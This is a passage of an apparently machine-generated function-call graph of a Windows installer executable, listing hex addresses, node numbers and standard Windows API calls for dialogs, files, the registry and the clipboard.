3650->3653 3654 403a77 3651->3654 3724 40601a lstrcpynW 3652->3724 3653->3645 3656 403a83 ShowWindow 3654->3656 3657 403b06 3654->3657 3659 406384 3 API calls 3656->3659 3716 40524c OleInitialize 3657->3716 3660 403a9b 3659->3660 3662 403aa9 GetClassInfoW 3660->3662 3664 406384 3 API calls 3660->3664 3661 403b0c 3663 403b28 3661->3663 3668 403b10 3661->3668 3666 403ad3 DialogBoxParamW 3662->3666 3667 403abd GetClassInfoW RegisterClassW 3662->3667 3665 40140b 2 API calls 3663->3665 3664->3662 3665->3641 3669 40140b 2 API calls 3666->3669 3667->3666 3668->3641 3670 40140b 2 API calls 3668->3670 3669->3641 3670->3641 3671->3513 3672->3544 3673->3549 3675 4063f4 5 API calls 3674->3675 3676 4035e8 lstrcatW 3675->3676 3676->3537 3676->3538 3678 40362a 3677->3678 3679 405699 GetLastError 3677->3679 3678->3550 3679->3678 3680 4056a8 SetFileSecurityW 3679->3680 3680->3678 3681 4056be GetLastError 3680->3681 3681->3678 3683 4056d5 3682->3683 3684 4056d9 GetLastError 3682->3684 3683->3550 3684->3683 3685->3552 3686->3563 3688 405c2b GetTickCount GetTempFileNameW 3687->3688 3689 405c61 3688->3689 3690 403268 3688->3690 3689->3688 3689->3690 3690->3498 3691->3589 3692->3591 3693->3595 3695 402d93 3694->3695 3696 402dab 3694->3696 3697 402da3 3695->3697 3698 402d9c DestroyWindow 3695->3698 3699 402db3 3696->3699 3700 402dbb GetTickCount 3696->3700 3697->3598 3698->3697 3701 406430 2 API calls 3699->3701 3702 402dc9 CreateDialogParamW ShowWindow 3700->3702 3703 402dec 3700->3703 3704 402db9 3701->3704 3702->3703 3703->3598 3704->3598 3705->3605 3706->3604 3708 403b4d 3707->3708 3725 405f61 wsprintfW 3708->3725 3710 403bbe 3711 40603c 18 API calls 3710->3711 3712 403bca SetWindowTextW 3711->3712 3713 4038ee 3712->3713 3714 403be6 3712->3714 3713->3628 3714->3713 3715 40603c 18 API calls 3714->3715 3715->3714 3717 40412a SendMessageW 3716->3717 3718 40526f 3717->3718 3721 401389 2 API calls 3718->3721 3722 405296 3718->3722 3719 40412a SendMessageW 3720 4052a8 CoUninitialize 3719->3720 3720->3661 3721->3718 3722->3719 3723->3624 3724->3630 3725->3710 4122 4021ea 4123 402bbf 18 API calls 4122->4123 4124 4021f0 4123->4124 4125 402bbf 18 API calls 4124->4125 4126 4021f9 4125->4126 4127 402bbf 18 API calls 4126->4127 4128 402202 4127->4128 4129 40635d 2 API calls 4128->4129 4130 40220b 4129->4130 4131 40221c lstrlenW lstrlenW 4130->4131 4132 40220f 4130->4132 4134 405179 25 API calls 4131->4134 4133 405179 25 API calls 4132->4133 4136 402217 4132->4136 4133->4136 4135 40225a SHFileOperationW 4134->4135 4135->4132 4135->4136 3726 40156b 3727 401584 3726->3727 3728 40157b ShowWindow 3726->3728 3729 401592 ShowWindow 3727->3729 3730 402a4c 3727->3730 3728->3727 3729->3730 4144 4050ed 4145 405111 4144->4145 4146 4050fd 4144->4146 4148 405119 IsWindowVisible 4145->4148 4154 405130 4145->4154 4147 405103 4146->4147 4156 40515a 4146->4156 4150 40412a SendMessageW 4147->4150 4151 405126 4148->4151 4148->4156 4149 40515f CallWindowProcW 4152 40510d 4149->4152 4150->4152 4157 404a43 SendMessageW 4151->4157 4154->4149 4162 404ac3 4154->4162 4156->4149 4158 404aa2 SendMessageW 4157->4158 4159 404a66 GetMessagePos ScreenToClient SendMessageW 4157->4159 4160 404a9a 4158->4160 4159->4160 4161 404a9f 4159->4161 4160->4154 4161->4158 4171 40601a lstrcpynW 4162->4171 4164 404ad6 4172 405f61 wsprintfW 4164->4172 4166 404ae0 4167 40140b 2 API calls 4166->4167 4168 404ae9 4167->4168 4173 40601a lstrcpynW 4168->4173 4170 404af0 4170->4156 4171->4164 4172->4166 4173->4170 4174 40226e 4175 402275 4174->4175 4178 402288 4174->4178 4176 40603c 18 API calls 4175->4176 4177 402282 4176->4177 4179 40575f MessageBoxIndirectW 4177->4179 4179->4178 4180 4014f1 SetForegroundWindow 4181 402a4c 4180->4181 4182 4041f2 lstrcpynW lstrlenW 4183 401673 4184 402bbf 18 API calls 4183->4184 4185 40167a 4184->4185 4186 402bbf 18 API calls 4185->4186 4187 401683 4186->4187 4188 402bbf 18 API calls 4187->4188 4189 40168c MoveFileW 4188->4189 4190 401698 4189->4190 4191 40169f 4189->4191 4193 401423 25 API calls 4190->4193 4192 40635d 2 API calls 4191->4192 4195 4021e1 4191->4195 4194 4016ae 4192->4194 4193->4195 4194->4195 4196 405ebb 38 API calls 4194->4196 4196->4190 4197 404af5 GetDlgItem GetDlgItem 4198 404b47 7 API calls 4197->4198 4212 404d60 4197->4212 4199 404bea DeleteObject 4198->4199 4200 404bdd SendMessageW 4198->4200 4201 404bf3 4199->4201 4200->4199 4203 404c2a 4201->4203 4206 40603c 18 API calls 4201->4206 4202 404e44 4205 404ef0 4202->4205 4208 404d53 4202->4208 4215 404e9d SendMessageW 4202->4215 4204 4040de 19 API calls 4203->4204 4207 404c3e 4204->4207 4209 404f02 4205->4209 4210 404efa SendMessageW 4205->4210 4211 404c0c SendMessageW SendMessageW 4206->4211 4214 4040de 19 API calls 4207->4214 4216 404145 8 API calls 4208->4216 4218 404f14 ImageList_Destroy 4209->4218 4219 404f1b 4209->4219 4226 404f2b 4209->4226 4210->4209 4211->4201 4212->4202 4213 404a43 5 API calls 4212->4213 4229 404dd1 4212->4229 4213->4229 4230 404c4c 4214->4230 4215->4208 4221 404eb2 SendMessageW 4215->4221 4222 4050e6 4216->4222 4217 404e36 SendMessageW 4217->4202 4218->4219 4223 404f24 GlobalFree 4219->4223 4219->4226 4220 40509a 4220->4208 4227 4050ac ShowWindow GetDlgItem ShowWindow 4220->4227 4225 404ec5 4221->4225 4223->4226 4224 404d21 GetWindowLongW SetWindowLongW 4228 404d3a 4224->4228 4236 404ed6 SendMessageW 4225->4236 4226->4220 4240 404ac3 4 API calls 4226->4240 4245 404f66 4226->4245 4227->4208 4231 404d40 ShowWindow 4228->4231 4232 404d58 4228->4232 4229->4202 4229->4217 4230->4224 4235 404c9c SendMessageW 4230->4235 4237 404d1b 4230->4237 4238 404cd8 SendMessageW 4230->4238 4239 404ce9 SendMessageW 4230->4239 4248 404113 SendMessageW 4231->4248 4249 404113 SendMessageW 4232->4249 4235->4230 4236->4205 4237->4224 4237->4228 4238->4230 4239->4230 4240->4245 4241 405070 InvalidateRect 4241->4220 4243 405086 4241->4243 4242 404faa 4242->4241 4247 40501e SendMessageW SendMessageW 4242->4247 4250 4049fe 4243->4250 4244 404f94 SendMessageW 4244->4242 4245->4242 4245->4244 4247->4242 4248->4208 4249->4212 4253 404935 4250->4253 4252 404a13 4252->4220 4254 40494e 4253->4254 4255 40603c 18 API calls 4254->4255 4256 4049b2 4255->4256 4257 40603c 18 API calls 4256->4257 4258 4049bd 4257->4258 4259 40603c 18 API calls 4258->4259 4260 4049d3 lstrlenW wsprintfW SetDlgItemTextW 4259->4260 4260->4252 4261 404579 4262 4045a5 4261->4262 4263 4045b6 4261->4263 4322 405743 GetDlgItemTextW 4262->4322 4265 4045c2 GetDlgItem 4263->4265 4271 404621 4263->4271 4269 4045d6 4265->4269 4266 4045b0 4268 4062ae 5 API calls 4266->4268 4267 404705 4270 4048b4 4267->4270 4324 405743 GetDlgItemTextW 4267->4324 4268->4263 4273 4045ea SetWindowTextW 4269->4273 4274 405a79 4 API calls 4269->4274 4278 404145 8 API calls 4270->4278 4271->4267 4271->4270 4275 40603c 18 API calls 4271->4275 4277 4040de 19 API calls 4273->4277 4279 4045e0 4274->4279 4280 404695 SHBrowseForFolderW 4275->4280 4276 404735 4281 405ad6 18 API calls 4276->4281 4282 404606 4277->4282 4283 4048c8 4278->4283 4279->4273 4287 4059ce 3 API calls 4279->4287 4280->4267 4284 4046ad CoTaskMemFree 4280->4284 4285 40473b 4281->4285 4286 4040de 19 API calls 4282->4286 4288 4059ce 3 API calls 4284->4288 4325 40601a lstrcpynW 4285->4325 4289 404614 4286->4289 4287->4273 4290 4046ba 4288->4290 4323 404113 SendMessageW 4289->4323 4293 4046f1 SetDlgItemTextW 4290->4293 4298 40603c 18 API calls 4290->4298 4293->4267 4294 40461a 4296 4063f4 5 API calls 4294->4296 4295 404752 4297 4063f4 5 API calls 4295->4297 4296->4271 4304 404759 4297->4304 4299 4046d9 lstrcmpiW 4298->4299 4299->4293 4302 4046ea lstrcatW 4299->4302 4300 40479a 4326 40601a lstrcpynW 4300->4326 4302->4293 4303 4047a1 4305 405a79 4 API calls 4303->4305 4304->4300 4308 405a1a 2 API calls 4304->4308 4310 4047f2 4304->4310 4306 4047a7 GetDiskFreeSpaceW 4305->4306 4309 4047cb MulDiv 4306->4309 4306->4310 4308->4304 4309->4310 4311 404863 4310->4311 4313 4049fe 21 API calls 4310->4313 4312 404886 4311->4312 4314 40140b 2 API calls 4311->4314 4327 404100 KiUserCallbackDispatcher 4312->4327 4315 404850 4313->4315 4314->4312 4317 404865 SetDlgItemTextW 4315->4317 4318 404855 4315->4318 4317->4311 4320 404935 21 API calls 4318->4320 4319 4048a2 4319->4270 4328 40450e 4319->4328 4320->4311 4322->4266 4323->4294 4324->4276 4325->4295 4326->4303 4327->4319 4329 404521 SendMessageW 4328->4329 4330 40451c 4328->4330 4329->4270 4330->4329 4331 401cfa GetDlgItem GetClientRect 4332 402bbf 18 API calls 4331->4332 4333 401d2c LoadImageW SendMessageW 4332->4333 4334 401d4a DeleteObject 4333->4334 4335 402a4c 4333->4335 4334->4335 3834 40237b 3835 402381 3834->3835 3836 402bbf 18 API calls 3835->3836 3837 402393 3836->3837 3838 402bbf 18 API calls 3837->3838 3839 40239d RegCreateKeyExW 3838->3839 3840 4023c7 3839->3840 3841 402a4c 3839->3841 3842 4023e2 3840->3842 3843 402bbf 18 API calls 3840->3843 3845 4023ee 3842->3845 3851 402ba2 3842->3851 3846 4023d8 lstrlenW 3843->3846 3844 402409 RegSetValueExW 3849 40241f RegCloseKey 3844->3849 3845->3844 3848 403027 36 API calls 3845->3848 3846->3842 3848->3844 3849->3841 3852 40603c 18 API calls 3851->3852 3853 402bb6 3852->3853 3853->3845 4336 40427b 4337 404293 4336->4337 4343 4043ad 4336->4343 4344 4040de 19 API calls 4337->4344 4338 404417 4339 404421 GetDlgItem 4338->4339 4340 4044e9 4338->4340 4341 4044aa 4339->4341 4342 40443b 4339->4342 4347 404145 8 API calls 4340->4347 4341->4340 4350 4044bc 4341->4350 4342->4341 4349 404461 6 API calls 4342->4349 4343->4338 4343->4340 4345 4043e8 GetDlgItem SendMessageW 4343->4345 4346 4042fa 4344->4346 4367 404100 KiUserCallbackDispatcher 4345->4367 4352 4040de 19 API calls 4346->4352 4348 4044e4 4347->4348 4349->4341 4354 4044d2 4350->4354 4355 4044c2 SendMessageW 4350->4355 4353 404307 CheckDlgButton 4352->4353 4365 404100 KiUserCallbackDispatcher 4353->4365 4354->4348 4358 4044d8 SendMessageW 4354->4358 4355->4354 4356 404412 4359 40450e SendMessageW 4356->4359 4358->4348 4359->4338 4360 404325 GetDlgItem 4366 404113 SendMessageW 4360->4366 4362 40433b SendMessageW 4363 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4362->4363 4364 404358 GetSysColor 4362->4364 4363->4348 4364->4363 4365->4360 4366->4362 4367->4356 4368 4027fb 4369 402bbf 18 API calls 4368->4369 4370 402802 FindFirstFileW 4369->4370 4371 402815 4370->4371 4372 40282a 4370->4372 4373 402833 4372->4373 4376 405f61 wsprintfW 4372->4376 4377 40601a lstrcpynW 4373->4377 4376->4373 4377->4371 4378 4014ff 4379 401507 4378->4379 4381 40151a 4378->4381 4380 402ba2 18 API calls 4379->4380 4380->4381 4382 401000 4383 401037 BeginPaint GetClientRect 4382->4383 4384 40100c DefWindowProcW 4382->4384 4386 4010f3 4383->4386 4387 401179 4384->4387 4388 401073 CreateBrushIndirect FillRect DeleteObject 4386->4388 4389 4010fc 4386->4389 4388->4386 4390 401102 CreateFontIndirectW 4389->4390 4391 401167 EndPaint 4389->4391 4390->4391 4392 401112 6 API calls 4390->4392 4391->4387 4392->4391 4400 401904 4401 40193b 4400->4401 4402 402bbf 18 API calls 4401->4402 4403 401940 4402->4403 4404 40580b 69 API calls 4403->4404 4405 401949 4404->4405 4406 402d04 4407 402d16 SetTimer 4406->4407 4408 402d2f 4406->4408 4407->4408 4409 402d84 4408->4409 4410 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4408->4410 4410->4409 3161 403c06 3162 403d59 3161->3162 3163 403c1e 3161->3163 3165 403d6a GetDlgItem GetDlgItem 3162->3165 3170 403daa 3162->3170 3163->3162 3164 403c2a 3163->3164 3166 403c35 SetWindowPos 3164->3166 3167 403c48 3164->3167 3168 4040de 19 API calls 3165->3168 3166->3167 3172 403c65 3167->3172 3173 403c4d ShowWindow 3167->3173 3174 403d94 SetClassLongW 3168->3174 3169 403e04 3179 403d54 3169->3179 3231 40412a 3169->3231 3170->3169 3178 401389 2 API calls 3170->3178 3175 403c87 3172->3175 3176 403c6d DestroyWindow 3172->3176 3173->3172 3177 40140b 2 API calls 3174->3177 3181 403c8c SetWindowLongW 3175->3181 3182 403c9d 3175->3182 3180 404067 3176->3180 3177->3170 3183 403ddc 3178->3183 3180->3179 3190 404098 ShowWindow 3180->3190 3181->3179 3186 403d46 3182->3186 3187 403ca9 GetDlgItem 3182->3187 3183->3169 3188 403de0 SendMessageW 3183->3188 3184 40140b 2 API calls 3201 403e16 3184->3201 3185 404069 DestroyWindow KiUserCallbackDispatcher 3185->3180 3250 404145 3186->3250 3191 403cd9 3187->3191 3192 403cbc SendMessageW IsWindowEnabled 3187->3192 3188->3179 3190->3179 3194 403ce6 3191->3194 3195 403d2d SendMessageW 3191->3195 3196 403cf9 3191->3196 3205 403cde 3191->3205 3192->3179 3192->3191 3193 40603c 18 API calls 3193->3201 3194->3195 3194->3205 3195->3186 3198 403d01 3196->3198 3199 403d16 3196->3199 3244 40140b 3198->3244 3203 40140b 2 API calls 3199->3203 3200 403d14 3200->3186 3201->3179 3201->3184 3201->3185 3201->3193 3204 4040de 19 API calls 3201->3204 3222 403fa9 DestroyWindow 3201->3222 3234 4040de 3201->3234 3206 403d1d 3203->3206 3204->3201 3247 4040b7 3205->3247 3206->3186 3206->3205 3208 403e91 GetDlgItem 3209 403ea6 3208->3209 3210 403eae ShowWindow KiUserCallbackDispatcher 3208->3210 3209->3210 3237 404100 KiUserCallbackDispatcher 3210->3237 3212 403ed8 EnableWindow 3215 403eec 3212->3215 3213 403ef1 GetSystemMenu EnableMenuItem SendMessageW 3214 403f21 SendMessageW 3213->3214 3213->3215 3214->3215 3215->3213 3238 404113 SendMessageW 3215->3238 3239 40601a lstrcpynW 3215->3239 3218 403f4f lstrlenW 3219 40603c 18 API calls 3218->3219 3220 403f65 SetWindowTextW 3219->3220 3240 401389 3220->3240 3222->3180 3223 403fc3 CreateDialogParamW 3222->3223 3223->3180 3224 403ff6 3223->3224 3225 4040de 19 API calls 3224->3225 3226 404001 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3225->3226 3227 401389 2 API calls 3226->3227 3228 404047 3227->3228 3228->3179 3229 40404f ShowWindow 3228->3229 3230 40412a SendMessageW 3229->3230 3230->3180 3232 404142 3231->3232 3233 404133 SendMessageW 3231->3233 3232->3201 3233->3232 3235 40603c 18 API calls 3234->3235 3236 4040e9 SetDlgItemTextW 3235->3236 3236->3208 3237->3212 3238->3215 3239->3218 3242 401390 3240->3242 3241 4013fe 3241->3201 3242->3241 3243 4013cb MulDiv SendMessageW 3242->3243 3243->3242 3245 401389 2 API calls 3244->3245 3246 401420 3245->3246 3246->3205 3248 4040c4 SendMessageW 3247->3248 3249 4040be 3247->3249 3248->3200 3249->3248 3251 40415d GetWindowLongW 3250->3251 3261 4041e6 3250->3261 3252 40416e 3251->3252 3251->3261 3253 404180 3252->3253 3254 40417d GetSysColor 3252->3254 3255 404190 SetBkMode 3253->3255 3256 404186 SetTextColor 3253->3256 3254->3253 3257 4041a8 GetSysColor 3255->3257 3258 4041ae 3255->3258 3256->3255 3257->3258 3259 4041b5 SetBkColor 3258->3259 3260 4041bf 3258->3260 3259->3260 3260->3261 3262 4041d2 DeleteObject 3260->3262 3263 4041d9 CreateBrushIndirect 3260->3263 3261->3179 3262->3263 3263->3261 4411 402786 4412 4029f7 4411->4412 4413 40278d 4411->4413 4414 402ba2 18 API calls 4413->4414 4415 402798 4414->4415 4416 40279f SetFilePointer 4415->4416 4416->4412 4417 4027af 4416->4417 4419 405f61 wsprintfW 4417->4419 4419->4412 4420 401907 4421 402bbf 18 API calls 4420->4421 4422 40190e 4421->4422 4423 40575f MessageBoxIndirectW 4422->4423 4424 401917 4423->4424 4425 401e08 4426 402bbf 18 API calls 4425->4426 4427 401e0e 4426->4427 4428 402bbf 18 API calls 4427->4428 4429 401e17 4428->4429 4430 402bbf 18 API calls 4429->4430 4431 401e20 4430->4431 4432 402bbf 18 API calls 4431->4432 4433 401e29 4432->4433 4434 401423 25 API calls 4433->4434 4435 401e30 ShellExecuteW 4434->4435 4436 401e61 4435->4436 3354 403789 3355 4037a1 3354->3355 3356 403793 CloseHandle 3354->3356 3361 4037ce 3355->3361 3356->3355 3362 4037dc 3361->3362 3363 4037e1 FreeLibrary GlobalFree 3362->3363 3364 4037a6 3362->3364 3363->3363 3363->3364 3365 40580b 3364->3365 3405 405ad6 3365->3405 3368 405833 DeleteFileW 3370 4037b2 3368->3370 3369 40584a 3371 405975 3369->3371 3419 40601a lstrcpynW 3369->3419 3371->3370 3378 40635d 2 API calls 3371->3378 3373 405870 3374 405883 3373->3374 3375 405876 lstrcatW 3373->3375 3420 405a1a lstrlenW 3374->3420 3376 405889 3375->3376 3379 405899 lstrcatW 3376->3379 3380 40588f 3376->3380 3381 40598f 3378->3381 3382 4058a4 lstrlenW FindFirstFileW 3379->3382 3380->3379 3380->3382 3381->3370 3383 405993 3381->3383 3384 40596a 3382->3384 3403 4058c6 3382->3403 3385 4059ce 3 API calls 3383->3385 3384->3371 3386 405999 3385->3386 3387 4057c3 5 API calls 3386->3387 3390 4059a5 3387->3390 3389 40594d FindNextFileW 3391 405963 FindClose 3389->3391 3389->3403 3392 4059a9 3390->3392 3393 4059bf 3390->3393 3391->3384 3392->3370 3396 405179 25 API calls 3392->3396 3395 405179 25 API calls 3393->3395 3395->3370 3398 4059b6 3396->3398 3397 40580b 62 API calls 3397->3403 3400 405ebb 38 API calls 3398->3400 3399 405179 25 API calls 3399->3389 3401 4059bd 3400->3401 3401->3370 3402 405179 25 API calls 3402->3403 3403->3389 3403->3397 3403->3399 3403->3402 3424 40601a lstrcpynW 3403->3424 3425 4057c3 3403->3425 3433 405ebb MoveFileExW 3403->3433 3437 40601a lstrcpynW 3405->3437 3407 405ae7 3438 405a79 CharNextW CharNextW 3407->3438 3410 40582b 3410->3368 3410->3369 3411 4062ae 5 API calls 3416 405afd 3411->3416 3412 405b2e lstrlenW 3413 405b39 3412->3413 3412->3416 3415 4059ce 3 API calls 3413->3415 3414 40635d 2 API calls 3414->3416 3417 405b3e GetFileAttributesW 3415->3417 3416->3410 3416->3412 3416->3414 3418 405a1a 2 API calls 3416->3418 3417->3410 3418->3412 3419->3373 3421 405a28 3420->3421 3422 405a3a 3421->3422 3423 405a2e CharPrevW 3421->3423 3422->3376 3423->3421 3423->3422 3424->3403 3426 405bca 2 API calls 3425->3426 3427 4057cf 3426->3427 3428 4057f0 3427->3428 3429 4057e6 DeleteFileW 3427->3429 3430 4057de RemoveDirectoryW 3427->3430 3428->3403 3431 4057ec 3429->3431 3430->3431 3431->3428 3432 4057fc SetFileAttributesW 3431->3432 3432->3428 3434 405edc 3433->3434 3435 405ecf 3433->3435 3434->3403 3444 405d49 lstrcpyW 3435->3444 3437->3407 3439 405a96 3438->3439 3442 405aa8 3438->3442 3440 405aa3 CharNextW 3439->3440 3439->3442 3443 405acc 3440->3443 3441 4059fb CharNextW 3441->3442 3442->3441 3442->3443 3443->3410 3443->3411 3445 405d71 3444->3445 3446 405d97 GetShortPathNameW 3444->3446 3471 405bef GetFileAttributesW CreateFileW 3445->3471 3448 405eb6 3446->3448 3449 405dac 3446->3449 3448->3434 3449->3448 3451 405db4 wsprintfA 3449->3451 3450 405d7b CloseHandle GetShortPathNameW 3450->3448 3452 405d8f 3450->3452 3453 40603c 18 API calls 3451->3453 3452->3446 3452->3448 3454 405ddc 3453->3454 3472 405bef GetFileAttributesW CreateFileW 3454->3472 3456 405de9 3456->3448 3457 405df8 GetFileSize GlobalAlloc 3456->3457 3458 405e1a 3457->3458 3459 405eaf CloseHandle 3457->3459 3460 405c72 ReadFile 3458->3460 3459->3448 3461 405e22 3460->3461 3461->3459 3473 405b54 lstrlenA 3461->3473 3464 405e39 lstrcpyA 3467 405e5b 3464->3467 3465 405e4d 3466 405b54 4 API calls 3465->3466 3466->3467 3468 405e92 SetFilePointer 3467->3468 3469 405ca1 WriteFile 3468->3469 3470 405ea8 GlobalFree 3469->3470 3470->3459 3471->3450 3472->3456 3474 405b95 lstrlenA 3473->3474 3475 405b9d 3474->3475 3476 405b6e lstrcmpiA 3474->3476 3475->3464 3475->3465 3476->3475 3477 405b8c CharNextA 3476->3477 3477->3474 4442 401491 4443 405179 25 API calls 4442->4443 4444 401498 4443->4444 4445 401a15 4446 402bbf 18 API calls 4445->4446 4447 401a1e ExpandEnvironmentStringsW 4446->4447 4448 401a32 4447->4448 4450 401a45 4447->4450 4449 401a37 lstrcmpW 4448->4449 4448->4450 4449->4450 4451 402515 4452 402bbf 18 API calls 4451->4452 4453 40251c 4452->4453 4456 405bef GetFileAttributesW CreateFileW 4453->4456 4455 402528 4456->4455 4457 402095 4458 402bbf 18 API calls 4457->4458 4459 40209c 4458->4459 4460 402bbf 18 API calls 4459->4460 4461 4020a6 4460->4461 4462 402bbf 18 API calls 4461->4462 4463 4020b0 4462->4463 4464 402bbf 18 API calls 4463->4464 4465 4020ba 4464->4465 4466 402bbf 18 API calls 4465->4466 4468 4020c4 4466->4468 4467 402103 CoCreateInstance 4472 402122 4467->4472 4468->4467 4469 402bbf 18 API calls 4468->4469 4469->4467 4470 401423 25 API calls 4471 4021e1 4470->4471 4472->4470 4472->4471 4473 401b16 4474 402bbf 18 API calls 4473->4474 4475 401b1d 4474->4475 4476 402ba2 18 API calls 4475->4476 4477 401b26 wsprintfW 4476->4477 4478 402a4c 4477->4478 3854 40159b 3855 402bbf 18 API calls 3854->3855 3856 4015a2 SetFileAttributesW 3855->3856 3857 4015b4 3856->3857 4493 401f1d 4494 402bbf 18 API calls 4493->4494 4495 401f24 4494->4495 4496 4063f4 5 API calls 4495->4496 4497 401f33 4496->4497 4498 401fb7 4497->4498 4499 401f4f GlobalAlloc 4497->4499 4499->4498 4500 401f63 4499->4500 4501 4063f4 5 API calls 4500->4501 4502 401f6a 4501->4502 4503 4063f4 5 API calls 4502->4503 4504 401f74 4503->4504 4504->4498 4508 405f61 wsprintfW 4504->4508 4506 401fa9 4509 405f61 wsprintfW 4506->4509 4508->4506 4509->4498 4510 40229d 4511 4022a5 4510->4511 4512 4022ab 4510->4512 4514 402bbf 18 API calls 4511->4514 4513 4022b9 4512->4513 4515 402bbf 18 API calls 4512->4515 4516 4022c7 4513->4516 4517 402bbf 18 API calls 4513->4517 4514->4512 4515->4513 4518 402bbf 18 API calls 4516->4518 4517->4516 4519 4022d0 WritePrivateProfileStringW 4518->4519 3858 40249e 3869 402cc9 3858->3869 3860 4024a8 3861 402ba2 18 API calls 3860->3861 3862 4024b1 3861->3862 3863 4024bc 3862->3863 3867 40281e 3862->3867 3864 4024d5 RegEnumValueW 3863->3864 3865 4024c9 RegEnumKeyW 3863->3865 3866 4024ee RegCloseKey 3864->3866 3864->3867 3865->3866 3866->3867 3870 402bbf 18 API calls 3869->3870 3871 402ce2 3870->3871 3872 402cf0 RegOpenKeyExW 3871->3872 3872->3860 4520 40149e 4521 402288 4520->4521 4522 4014ac PostQuitMessage 4520->4522 4522->4521 4523 40231f 4524 402324 4523->4524 4525 40234f 4523->4525 4527 402cc9 19 API calls 4524->4527 4526 402bbf 18 API calls 4525->4526 4528 402356 4526->4528 4529 40232b 4527->4529 4534 402bff RegOpenKeyExW 4528->4534 4530 402bbf 18 API calls 4529->4530 4533 40236c 4529->4533 4531 40233c RegDeleteValueW RegCloseKey 4530->4531 4531->4533 4541 402c2a 4534->4541 4543 402c76 4534->4543 4535 402c50 RegEnumKeyW 4536 402c62 RegCloseKey 4535->4536 4535->4541 4538 4063f4 5 API calls 4536->4538 4537 402c87 RegCloseKey 4537->4543 4540 402c72 4538->4540 4539 402bff 5 API calls 4539->4541 4542 402ca2 RegDeleteKeyW 4540->4542 4540->4543 4541->4535 4541->4536 4541->4537 4541->4539 4542->4543 4543->4533 4551 403821 4552 40382c 4551->4552 4553 403830 4552->4553 4554 403833 GlobalAlloc 4552->4554 4554->4553 4555 401ca3 4556 402ba2 18 API calls 4555->4556 4557 401ca9 IsWindow 4556->4557 4558 401a05 4557->4558 4559 402a27 SendMessageW 4560 402a41 InvalidateRect 4559->4560 4561 402a4c 4559->4561 4560->4561 4562 40242a 4563 402cc9 19 API calls 4562->4563 4564 402434 4563->4564 4565 402bbf 18 API calls 4564->4565 4566 40243d 4565->4566 4567 402448 RegQueryValueExW 4566->4567 4570 40281e 4566->4570 4568 40246e RegCloseKey 4567->4568 4569 402468 4567->4569 4568->4570 4569->4568 4573 405f61 wsprintfW 4569->4573 4573->4568 4574 40422c lstrlenW 4575 40424b 4574->4575 4576 40424d WideCharToMultiByte 4574->4576 4575->4576 4577 40172d 4578 402bbf 18 API calls 4577->4578 4579 401734 SearchPathW 4578->4579 4580 40174f 4579->4580 4588 404532 4589 404542 4588->4589 4590 404568 4588->4590 4591 4040de 19 API calls 4589->4591 4592 404145 8 API calls 4590->4592 4593 40454f SetDlgItemTextW 4591->4593 4594 404574 4592->4594 4593->4590 4595 4027b4 4596 4027ba 4595->4596 4597 4027c2 FindClose 4596->4597 4598 402a4c 4596->4598 4597->4598 3731 401b37 3732 401b88 3731->3732 3734 401b44 3731->3734 3735 401bb2 GlobalAlloc 3732->3735 3736 401b8d 3732->3736 3733 401bcd 3738 40603c 18 API calls 3733->3738 3744 402288 3733->3744 3734->3733 3740 401b5b 3734->3740 3737 40603c 18 API calls 3735->3737 3736->3744 3752 40601a lstrcpynW 3736->3752 3737->3733 3741 402282 3738->3741 3750 40601a lstrcpynW 3740->3750 3746 40575f MessageBoxIndirectW 3741->3746 3742 401b9f GlobalFree 3742->3744 3745 401b6a 3751 40601a lstrcpynW 3745->3751 3746->3744 3748 401b79 3753 40601a lstrcpynW 3748->3753 3750->3745 3751->3748 3752->3742 3753->3744 4599 402537 4600 402562 4599->4600 4601 40254b 4599->4601 4603 402596 4600->4603 4604 402567 4600->4604 4602 402ba2 18 API calls 4601->4602 4611 402552 4602->4611 4606 402bbf 18 API calls 4603->4606 4605 402bbf 18 API calls 4604->4605 4607 40256e WideCharToMultiByte lstrlenA 4605->4607 4608 40259d lstrlenW 4606->4608 4607->4611 4608->4611 4609 4025e0 4610 4025ca 4610->4609 4612 405ca1 WriteFile 4610->4612 4611->4609 4611->4610 4613 405cd0 5 API calls 4611->4613 4612->4609 4613->4610 3754 4052b8 3755 405462 3754->3755 3756 4052d9 GetDlgItem GetDlgItem GetDlgItem 3754->3756 3758 405493 3755->3758 3759 40546b GetDlgItem CreateThread CloseHandle 3755->3759 3800 404113 SendMessageW 3756->3800 3761 4054be 3758->3761 3762 4054e3 3758->3762 3763 4054aa ShowWindow ShowWindow 3758->3763 3759->3758 3803 40524c 5 API calls 3759->3803 3760 405349 3767 405350 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3760->3767 3764 4054ca 3761->3764 3765 40551e 3761->3765 3766 404145 8 API calls 3762->3766 3802 404113 SendMessageW 3763->3802 3769 4054d2 3764->3769 3770 4054f8 ShowWindow 3764->3770 3765->3762 3777 40552c SendMessageW 3765->3777 3772 4054f1 3766->3772 3775 4053a2 SendMessageW SendMessageW 3767->3775 3776 4053be 3767->3776 3771 4040b7 SendMessageW 3769->3771 3773 405518 3770->3773 3774 40550a 3770->3774 3771->3762 3779 4040b7 SendMessageW 3773->3779 3778 405179 25 API calls 3774->3778 3775->3776 3780 4053d1 3776->3780 3781 4053c3 SendMessageW 3776->3781 3777->3772 3782 405545 CreatePopupMenu 3777->3782 3778->3773 3779->3765 3784 4040de 19 API calls 3780->3784 3781->3780 3783 40603c 18 API calls 3782->3783 3785 405555 AppendMenuW 3783->3785 3786 4053e1 3784->3786 3789 405572 GetWindowRect 3785->3789 3790 405585 TrackPopupMenu 3785->3790 3787 4053ea ShowWindow 3786->3787 3788 40541e GetDlgItem SendMessageW 3786->3788 3791 405400 ShowWindow 3787->3791 3792 40540d 3787->3792 3788->3772 3794 405445 SendMessageW SendMessageW 3788->3794 3789->3790 3790->3772 3793 4055a0 3790->3793 3791->3792 3801 404113 SendMessageW 3792->3801 3795 4055bc SendMessageW 3793->3795 3794->3772 3795->3795 3796 4055d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3795->3796 3798 4055fe SendMessageW 3796->3798 3798->3798 3799 405627 GlobalUnlock SetClipboardData CloseClipboard 3798->3799 3799->3772 3800->3760 3801->3788 3802->3761 4614 4014b8 4615 4014be 4614->4615 4616 401389 2 API calls 4615->4616 4617 4014c6 4616->4617 3810 4015b9 3811 402bbf 18 API calls 3810->3811 3812 4015c0 3811->3812 3813 405a79 4 API calls 3812->3813 3825 4015c9 3813->3825 3814 401629 3816 40165b 3814->3816 3817 